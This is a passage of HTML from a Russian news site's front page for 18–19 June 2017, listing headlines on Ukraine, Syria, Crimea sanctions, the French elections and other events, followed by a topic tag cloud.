    <div class="top-news-story">
      
        
          <img src="/media/photolib/2015/02/17/thumbs/4104862986_2eb68e0317_z_1497857922.jpg.88x66_q85.jpg" alt="Флаг Украины" title="Флаг Украины" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/06/19/convergence_project/" class="hover">В Киеве разработали новый план сближения с ДНР и ЛНР</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2017/06/19/thumbs/1013782459_1497864098.jpg.88x66_q85.jpg" alt="Алексей Ерхов" title="Алексей Ерхов" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/06/19/erkhov/" class="hover">Назначен новый посол РФ в Турции</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2015/12/23/thumbs/sir2_1497873965.jpg.88x66_q85.jpg" alt="ВКС РФ в Сирии" title="ВКС РФ в Сирии" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/06/19/syria3/" class="hover">Военные РФ заявили о прекращении взаимодействия с США по Сирии</a>
      </div>
    </div>
  
    <div class="top-news-story">
      
        
          <img src="/media/photolib/2017/04/18/thumbs/_800-600-3_htPOsMD_1497863423.jpg.88x66_q85.jpg" alt="Валюта. Доллар и евро" title="Валюта. Доллар и евро" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/06/19/euro65/" class="hover">Курс евро превысил 65 рублей впервые с февраля</a>
      </div>
    </div>
  
    <div class="top-news-story top-news-story-last">
      
        
          <img src="/media/photolib/2016/11/15/thumbs/1_TO26fmf_1497868601.jpg.88x66_q85.jpg" alt="Владимир Путин и Дмитрий Песков" title="Владимир Путин и Дмитрий Песков" class="img-left d88x66"/>
        
      
      <div class="top-news-text">
        <a href="/news/2017/06/19/kremlin_reaction/" class="hover">Кремль отреагировал на продление санкций против Крыма</a>
      </div>
    </div>
  
</div>



  

  

  

  
  <div class="front-right-slot"></div>

  

  
<div class="news-lenta">

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">16:12</span>
            </span><a href="/news/2017/06/19/pepper_gas/" class="hover">Полиция Петербурга заявила о законности применения перцового газа против задержанных</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">15:45</span>
            </span><a href="/news/2017/06/19/kursky_railway/" class="hover">У Курского вокзала поезд столкнулся с электричкой</a>
        </div>
    
<div class="news-right-slot2"></div>
    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">15:25</span>
            </span><a href="/news/2017/06/19/ps_kepler_conjecture/" class="hover">Окончательно доказана гипотеза Кеплера об упаковке шаров</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">15:19</span>
            </span><a href="/news/2017/06/19/yavlinsky/" class="hover">Явлинский начал сбор подписей за выход РФ из военных конфликтов</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:27</span>
            </span><a href="/news/2017/06/19/stone2/" class="hover">В Кремле рассказали о деталях интервью Стоуна с Путиным</a>
        </div>
    

    

<div class="zabveniya-block" style="margin: 15px 0;font-family: Arial, Helvetica, sans-serif;">
<h4 style="background-color: #007854; text-align: center; font-weight: bold; color: #FFF;">ЗАБВЕНИЯ.NET</h4>
<a href="/news/2017/06/19/patsaev/">
  <div style="font-weight: bold;font-family: Arial, Helvetica, sans-serif;">Мемория. Виктор Пацаев</div>
  
    <img src="/media/photolib/2015/06/18/thumbs/pazaev1_1497453147.jpg.0x195_q85_crop_cropsize-260x195_upscale.jpg" alt="Виктор Иванович Пацаев" title="Виктор Иванович Пацаев" width="240"/>
  
  <div style="font-family: Arial, Helvetica, sans-serif;">19 июня 1933 года родился Виктор Пацаев, советский космонавт, член погибшего экипажа «Союз-11».</div>
</a>
</div>


    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:19</span>
            </span><a href="/news/2017/06/19/syria3/" class="hover">Военные РФ заявили о прекращении взаимодействия с США по Сирии</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:02</span>
            </span><a href="/news/2017/06/19/sk_gert_gib/" class="hover">Group-IB заблокировала сайты мошенников, использовавших бренд «Аэрофлот»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">14:01</span>
            </span><a href="/news/2017/06/19/highrises/" class="hover">Число жертв пожара в лондонской высотке могло достичь 79 человек</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:52</span>
            </span><a href="/news/2017/06/19/ps_vyazma/" class="hover">Археологи выяснили время появления города Вязьмы</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:36</span>
            </span><a href="/news/2017/06/19/kremlin_reaction/" class="hover">Кремль отреагировал на продление санкций против Крыма</a>
        </div>
    
    </div>
    

    
    <div class="news-right-slot10"></div>
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:19</span>
            </span><a href="/news/2017/06/19/poroshenko_usa/" class="hover">Киев заявил об отъезде Порошенко в США</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">13:08</span>
            </span><a href="/news/2017/06/19/eurobonds/" class="hover">Минфин РФ начал размещать 10-летние и 30-летние евробонды</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:27</span>
            </span><a href="/news/2017/06/19/parttime_work/" class="hover">Путин утвердил изменения в ТК о выплате премиальных за сверхурочную работу</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:10</span>
            </span><a href="/news/2017/06/19/euro65/" class="hover">Курс евро превысил 65 рублей впервые с февраля</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">12:01</span>
            </span><a href="/news/2017/06/19/erkhov/" class="hover">Назначен новый посол РФ в Турции</a>
        </div>
    

    
    
    <div class="news-right-slot"></div>
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:47</span>
            </span><a href="/news/2017/06/19/economy_position/" class="hover">ВЦИОМ зафиксировал максимальную оценку экономического положения России</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:40</span>
            </span><a href="/news/2017/06/19/russian_weather/" class="hover">В ряде регионов России объявлен желтый уровень опасности</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:26</span>
            </span><a href="/news/2017/06/19/valery_fadeev/" class="hover">Журналист Валерий Фадеев возглавил Общественную палату РФ</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:25</span>
            </span><a href="/news/2017/06/19/editorial_policy/" class="hover">Березкин пообещал не влиять на редакционную политику РБК</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">11:17</span>
            </span><a href="/news/2017/06/19/nonbanks/" class="hover">ЦБ отозвал лицензии у двух небанковских кредитных организаций</a>
        </div>
    

    
    
    
    <div class="news-right-slot20"></div>
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:48</span>
            </span><a href="/news/2017/06/19/crimea_sanc/" class="hover">ЕС продлил на год санкции против Крыма</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:38</span>
            </span><a href="/news/2017/06/19/convergence_project/" class="hover">В Киеве разработали новый план сближения с ДНР и ЛНР</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:28</span>
            </span><a href="/news/2017/06/19/c300_respond/" class="hover">Совфед пригрозил США ответом с помощью С-300 в Сирии</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:18</span>
            </span><a href="/news/2017/06/19/gas_attack/" class="hover">В Петербурге задержанные 12 июня заявили о «газовой атаке» на свои камеры</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:05</span>
            </span><a href="/news/2017/06/19/drilling_rigs/" class="hover">Нефть начала дешеветь после сообщения о буровых установках в США</a>
        </div>
    

    
    
    
    
    <div class="news-right-slot25"></div>
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">10:00</span>
            </span><a href="/news/2017/06/19/business_pressure/" class="hover">ЦСР Кудрина назвал бессмысленными меры по снижению давления силовиков на бизнес</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:46</span>
            </span><a href="/news/2017/06/19/observation_flight/" class="hover">ВВС США и Украины выполнят наблюдательный полет над Россией</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:26</span>
            </span><a href="/news/2017/06/19/syria_fighter/" class="hover">Возглавляемая США коалиция заявила о звонке российским военным после атаки в Сирии</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:19</span>
            </span><a href="/news/2017/06/19/kurils_japan/" class="hover">Первый чартер из Японии на Курилы не полетел из-за погоды</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">09:07</span>
            </span><a href="/news/2017/06/19/overall_majority/" class="hover">На парламентских выборах во Франции партия Макрона получила абсолютное большинство</a>
        </div>
    

    
    
    
    
    
    
<script type="text/javascript"><!--
google_ad_client = "ca-pub-1191230850516122";
/* adxguru\polit.ru\240x400\0 */
google_ad_slot = "2380101327";
google_ad_width = 240;
google_ad_height = 400;
//-->
</script>
<script type="text/javascript"
src="//pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">08:59</span>
            </span><a href="/news/2017/06/19/london_teract/" class="hover">В Лондоне грузовик въехал в толпу людей </a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 20:36</span>
            </span><a href="/news/2017/06/18/basta/" class="hover">В Одессе отменен концерт Басты</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 20:22</span>
            </span><a href="/news/2017/06/18/robbery/" class="hover">КНДР обвинила США в «грабеже» своих дипломатов в Нью-Йорке</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 20:12</span>
            </span><a href="/news/2017/06/18/portugal/" class="hover">Португалия сыграла вничью с Мексикой в матче Кубка конфедераций</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 19:37</span>
            </span><a href="/news/2017/06/18/big_airbus/" class="hover">Airbus показал крупнейший пассажирский самолет</a>
        </div>
    

    
    
    
    
    
    
    <div class="news-right-slot35"></div>

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 19:10</span>
            </span><a href="/news/2017/06/18/no_damage/" class="hover">МВД не подтвердило данные об угрозах свидетелям ДТП с «пьяным мальчиком»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 18:44</span>
            </span><a href="/news/2017/06/18/voter_meeting/" class="hover">В РФ встречи с избирателями приравняли к митингам</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 18:00</span>
            </span><a href="/news/2017/06/18/eurasia/" class="hover">В Москве при попытке взобраться на небоскреб задержан мужчина</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 17:27</span>
            </span><a href="/news/2017/06/18/roizman/" class="hover">Ройзмана выдвинули в губернаторы Свердловской области</a>
        </div>
    

    
    
    
    
    
    
    

    
    <div class="news-story-highlight">
    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 17:13</span>
            </span><a href="/news/2017/06/18/chernikov/" class="hover">Назначен новый глава ГИБДД</a>
        </div>
    
    </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 16:43</span>
            </span><a href="/news/2017/06/18/witnesses_threats/" class="hover">Омбудсмен рассказала об угрозах очевидцам ДТП с «пьяным мальчиком»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 16:07</span>
            </span><a href="/news/2017/06/18/weeks/" class="hover">Судья боя Ковалева с Уордом признал свою ошибку</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 14:59</span>
            </span><a href="/news/2017/06/18/safin/" class="hover">«Единая Россия» нашла кандидата на мандат Сафина</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 14:34</span>
            </span><a href="/news/2017/06/18/low_turnout/" class="hover">Во втором туре выборов в парламент Франции оказалась низкая явка</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 14:17</span>
            </span><a href="/news/2017/06/18/istanbul_teract/" class="hover">США предупредили об угрозе терактов в Стамбуле</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 14:01</span>
            </span><a href="/news/2017/06/18/forest_victims/" class="hover">Число жертв лесных пожаров в Португалии достигло 60 человек</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 13:39</span>
            </span><a href="/news/2017/06/18/torture_chamber/" class="hover">Задержанного на акции 12 июня держали в «камере пыток»</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 12:56</span>
            </span><a href="/news/2017/06/18/lgbt_kiev/" class="hover">В Киеве на ЛГБТ-акции произошли столкновения</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 12:45</span>
            </span><a href="/news/2017/06/18/trump_cuba/" class="hover">МИД РФ предложил Трампу наладить диалог с Кубой</a>
        </div>
    

    
    
    
    
    
    
    

    
        <div class="agregator-story">
            <span class="time">
                <span class="text">18.06 12:09</span>
            </span><a href="/news/2017/06/18/maduro_twitter/" class="hover">Лидер Венесуэлы обвинил Twitter в фашизме</a>
        </div>
    

    
    
    
    
    
    
    

</div>


  
  
    


  

<div class="tags-cloud">

  

  

  

  

  

  
  <a href="/tag/apple/" class="weight8">Apple</a>
  

  

  

  

  

  

  

  
  <a href="/tag/boeing/" class="weight8">Boeing</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/facebook/" class="weight7">Facebook</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/google/" class="weight7">Google</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/it/" class="weight5">IT</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/nato/" class="weight9">NATO</a>
  

  

  

  

  

  
  <a href="/tag/pro-science-video/" class="weight0 macrotag">PRO SCIENCE видео</a>
  

  
  <a href="/tag/proscience-theatre/" class="weight8 force-hi macrotag">ProScience Театр</a>
  

  
  <a href="/tag/pussy-riot/" class="weight8">Pussy Riot</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/twitter/" class="weight7">Twitter</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/railwayincidents/" class="weight7">аварии на железной дороге</a>
  

  

  
  <a href="/tag/aviakatastrofa/" class="weight10 force-hi">авиакатастрофа</a>
  

  

  
  <a href="/tag/australia/" class="weight8">Австралия</a>
  

  
  <a href="/tag/avstriya/" class="weight5">Австрия</a>
  

  

  

  

  

  

  

  
  <a href="/tag/avtoprom/" class="weight9">автопром</a>
  

  

  

  

  
  <a href="/tag/administraciya-prezidenta/" class="weight6">администрация президента</a>
  

  

  

  

  
  <a href="/tag/azerbaijan/" class="weight7">Азербайджан</a>
  

  

  

  

  

  

  

  
  <a href="/tag/akcii-protesta/" class="weight9">акции протеста</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/aleksandr-lukashenko/" class="weight7">Александр Лукашенко</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/aleksej-kudrin/" class="weight6">Алексей Кудрин</a>
  

  

  

  

  

  
  <a href="/tag/alexey_navalny/" class="weight9">Алексей Навальный</a>
  

  

  

  

  

  
  <a href="/tag/aleksej-ulyukaev/" class="weight7">Алексей Улюкаев</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/alcohol/" class="weight8">алкоголь</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/amnisty/" class="weight6">амнистия</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/anatolij-serdyukov/" class="weight6">Анатолий Сердюков</a>
  

  

  

  

  

  
  <a href="/tag/angela-merkel/" class="weight8">Ангела Меркель</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/antimajdan/" class="weight10">Антимайдан</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/armeniya/" class="weight8">Армения</a>
  

  
  <a href="/tag/army/" class="weight11 force-hi">армия</a>
  

  

  

  

  
  <a href="/tag/arsenij-yacenyuk/" class="weight8">Арсений Яценюк</a>
  

  

  

  

  

  

  

  
  <a href="/tag/archeology/" class="weight9">археология</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/astronomy_topic/" class="weight8">астрономия</a>
  

  

  

  

  

  

  
  <a href="/tag/nuclear_energy/" class="weight10 force-hi">атомная энергия</a>
  

  

  

  
  <a href="/tag/aukciony/" class="weight3">аукционы</a>
  

  

  

  
  <a href="/tag/afganistan/" class="weight8">Афганистан</a>
  

  

  

  

  
  <a href="/tag/aeroflot/" class="weight7">Аэрофлот</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/mezhkontinentalnye-ballisticheskie-rakety/" class="weight6">баллистические ракеты</a>
  

  

  

  

  

  
  <a href="/tag/bankovskij-sektor/" class="weight10 force-hi">банковский сектор</a>
  

  
  <a href="/tag/bankrotstvo/" class="weight6">банкротство</a>
  

  
  <a href="/tag/barak-obama/" class="weight10">Барак Обама</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/bashar-asad/" class="weight7">Башар Асад</a>
  

  
  <a href="/tag/bashkiriya/" class="weight5">Башкирия</a>
  

  

  
  <a href="/tag/bezhency/" class="weight8">беженцы</a>
  

  

  

  

  

  

  
  <a href="/tag/Belarus/" class="weight9">Белоруссия</a>
  

  
  <a href="/tag/belyj-dom/" class="weight5">Белый дом</a>
  

  

  
  <a href="/tag/belgiya/" class="weight7">Бельгия</a>
  

  

  

  

  

  
  <a href="/tag/besporyadki/" class="weight9">беспорядки</a>
  

  

  

  

  

  

  

  
  <a href="/tag/biznes/" class="weight9">бизнес</a>
  

  

  

  

  
  <a href="/tag/biology/" class="weight10">биология </a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/izr/" class="weight9">ближневосточный конфликт</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/boks/" class="weight6">бокс</a>
  

  

  
  <a href="/tag/football_fans/" class="weight7">болельщики</a>
  

  

  

  
  <a href="/tag/bolotnoe-delo/" class="weight8">«болотное дело»</a>
  

  

  

  

  
  <a href="/tag/bolshoj-tennis/" class="weight6">большой теннис</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/boris-nemcov/" class="weight8">Борис Немцов</a>
  

  

  

  

  

  

  

  
  <a href="/tag/braziliya/" class="weight8">Бразилия</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vvp/" class="weight5">ВВП</a>
  

  

  

  

  

  

  
  <a href="/tag/velikaya-otechestvennaya-vojna/" class="weight7">Великая Отечественная война</a>
  

  

  
  <a href="/tag/UK/" class="weight10 force-hi">Великобритания</a>
  

  

  

  
  <a href="/tag/venesuela/" class="weight7">Венесуэла</a>
  

  

  

  

  

  

  
  <a href="/tag/verhovnaya-rada/" class="weight9">Верховная Рада</a>
  

  
  <a href="/tag/verhovnyj-sud/" class="weight7">Верховный суд</a>
  

  

  

  
  <a href="/tag/vzryv/" class="weight10">взрыв</a>
  

  
  <a href="/tag/bribe/" class="weight8">взятка</a>
  

  
  <a href="/tag/videon_lectures/" class="weight6">видеозаписи публичных лекций «Полит.ру»</a>
  

  
  <a href="/tag/video/" class="weight9">видео «Полит.ру»</a>
  

  

  

  
  <a href="/tag/vizovyj-rezhim/" class="weight8">визовый режим</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/viktor-yanukovich/" class="weight8">Виктор Янукович</a>
  

  

  

  
  <a href="/tag/virus/" class="weight6 force-hi">вирусы</a>
  

  

  

  

  
  <a href="/tag/vitalij-mutko/" class="weight7">Виталий Мутко</a>
  

  

  

  

  

  
  <a href="/tag/vkontakte/" class="weight7">«ВКонтакте»</a>
  

  
  <a href="/tag/airborne/" class="weight8">ВКС</a>
  

  
  <a href="/tag/vladivostok/" class="weight5">Владивосток</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vladimir-zhirinovskij/" class="weight6">Владимир Жириновский</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vladimir-markin/" class="weight4">Владимир Маркин</a>
  

  

  
  <a href="/tag/vladimir-medinskij/" class="weight5">Владимир Мединский</a>
  

  

  

  

  

  

  
  <a href="/tag/vladimir-putin/" class="weight12 force-hi">Владимир Путин</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vmf/" class="weight8">ВМФ</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/air_force/" class="weight9">военная авиация</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/volgograd/" class="weight6">Волгоград</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/vtb/" class="weight4">ВТБ</a>
  

  
  <a href="/tag/vtoraya-mirovaya-vojna/" class="weight7">Вторая мировая война</a>
  

  

  
  <a href="/tag/vuzy/" class="weight8">вузы</a>
  

  

  

  
  <a href="/tag/vybory/" class="weight11 force-hi">выборы</a>
  

  
  <a href="/tag/vybory-gubernatorov/" class="weight6">выборы губернаторов</a>
  

  
  <a href="/tag/vybory-mera-moskvy/" class="weight7">выборы мэра Москвы</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/gazovaya-promyshlennost/" class="weight9">газовая промышленность</a>
  

  

  

  
  <a href="/tag/gazprom/" class="weight10">«Газпром»</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/genetics/" class="weight7">генетика</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/genprokuratura/" class="weight9">Генпрокуратура</a>
  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/germaniya/" class="weight10">Германия</a>
  

  

  

  

  
  <a href="/tag/gibdd/" class="weight7">ГИБДД</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/glonass/" class="weight4">ГЛОНАСС</a>
  

  

  

  

  

  

  

  
  <a href="/tag/hollywood/" class="weight7">Голливуд</a>
  

  

  

  
  <a href="/tag/homosexuality/" class="weight5">гомосексуализм</a>
  

  

  

  

  

  

  

  

  
  <a href="/tag/gosbyudzhet/" class="weight9">госбюджет</a>
  

  
  <a href="/tag/gosdep/" class="weight8">Госдеп</a>
  

  
  <a href="/tag/gosduma/" class="weight11 force-hi">Госдума</a>
  

  
  <a href="/tag/goszakupki/" class="weight6">госзакупки</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/grazhdanskaya-aviaciya/" class="weight11 force-hi">гражданская авиация</a>
  

  

  

  

  
  <a href="/tag/greece/" class="weight9">Греция</a>
  

  

  

  

  

  
  <a href="/tag/greenpeace/" class="weight6">Гринпис</a>
  

  

  

  

  
  <a href="/tag/georgia/" class="weight10 force-hi">Грузия</a>
  

  

  

  

  
  <a href="/tag/gumanitarnaya-pomosh/" class="weight6">гуманитарная помощь</a>
  

  
  <a href="/tag/liberal_arts/" class="weight8">гуманитарные и социальные  науки</a>
  

  

  

  

  

  
  <a href="/tag/dagestan/" class="weight9">Дагестан</a>
  

  

  
  <a href="/tag/dalnij-vostok/" class="weight7">Дальний Восток</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dengi/" class="weight7">деньги</a>
  

  

  
  <a href="/tag/den-pobedy/" class="weight6">День Победы</a>
  

  

  

  
  <a href="/tag/deti/" class="weight10">дети</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dmitriy_medvedev/" class="weight10 force-hi">Дмитрий Медведев</a>
  

  

  
  <a href="/tag/dmitrij-peskov/" class="weight10">Дмитрий Песков</a>
  

  
  <a href="/tag/dmitrij-rogozin/" class="weight7">Дмитрий Рогозин</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/dollar/" class="weight9">доллар</a>
  

  

  

  

  

  
  <a href="/tag/domodedovo/" class="weight7">Домодедово</a>
  

  
  <a href="/tag/donald-tramp/" class="weight9">Дональд Трамп</a>
  

  

  
  <a href="/tag/doneck/" class="weight11 force-hi">Донецк</a>
  

  

  
  <a href="/tag/doping/" class="weight9">допинг</a>
  

  
  <a href="/tag/russian_roads/" class="weight6">дороги России</a>
  

  

  
  <a href="/tag/draka/" class="weight7">драка</a>
  

  

  

  

  
  <a href="/tag/dtp/" class="weight10 force-hi">ДТП</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/evgeniya-vasileva/" class="weight7">Евгения Васильева</a>
  

  

  

  
  <a href="/tag/evro/" class="weight9">евро</a>
  

  

  

  
  <a href="/tag/eurovision/" class="weight2">Евровидение</a>
  

  
  <a href="/tag/evrokomissiya/" class="weight5">Еврокомиссия</a>
  

  
  <a href="/tag/evromajdan/" class="weight10">Евромайдан</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/EU/" class="weight11 force-hi">Евросоюз</a>
  

  
  <a href="/tag/egipet/" class="weight9">Египет</a>
  

  

  
  <a href="/tag/obraz/" class="weight9">ЕГЭ</a>
  

  
  <a href="/tag/edinaya-rossiya/" class="weight9">«Единая Россия»</a>
  

  

  

  

  
  <a href="/tag/ekaterinburg/" class="weight8">Екатеринбург</a>
  

  

  

  

  

  

  

  
  <a href="/tag/espch/" class="weight6">ЕСПЧ</a>
  

  
  <a href="/tag/natural_sciences/" class="weight8 force-hi macrotag">естественные и точные науки</a>
  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/zhkh/" class="weight8">ЖКХ</a>
  

  

  

  
  <a href="/tag/zhurnalisty/" class="weight9">журналисты</a>
  

  
  <a href="/tag/zabajkalskij-kraj/" class="weight4">Забайкальский край</a>
  

  

  

  
  <a href="/tag/foreign_agents_law/" class="weight7">закон об «иностранных агентах»</a>
  

  

  
  <a href="/tag/zakonotvorchestvo/" class="weight10 force-hi">законотворчество</a>
  

  

  

  

  

  

  

  

  

  
  <a href="/tag/healthcare_russia/" class="weight7">здравоохранение в России</a>
  

  

  
  <a href="/tag/zemletryasenie/" class="weight8">землетрясение</a>
  

  

  
  <a href="/tag/zenit/" class="weight6">«Зенит»</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/israel/" class="weight9">Израиль</a>
  

  

  

  

  

  

  

  

  

  

  

  

  

  
  <a href="/tag/India/" class="weight8">Индия</a>
  

  
  <a href="/tag/indonesia/" class="weight6">Индонезия</a>
  

  

  
  <a href="/tag/innovation/" class="weight7">инновации</a>
  

  

  

  

  

  

  
  <a href="/tag/science_interview/" class="weight5">Интервью ученых</a>
  

  
  <a href="/tag/internet/" class="weight10 force-hi">интернет</a>
  

  

  
  <a href="/tag/inflation/" class="weight6">инфляция</a>
  

  

  

  

  

  
  <a href="/tag/irak/" class="weight9">Ирак</a>
  

  

  
  <a href="/tag/iraqafterwar/" class="weight9">Ирак после войны</a>
  

  
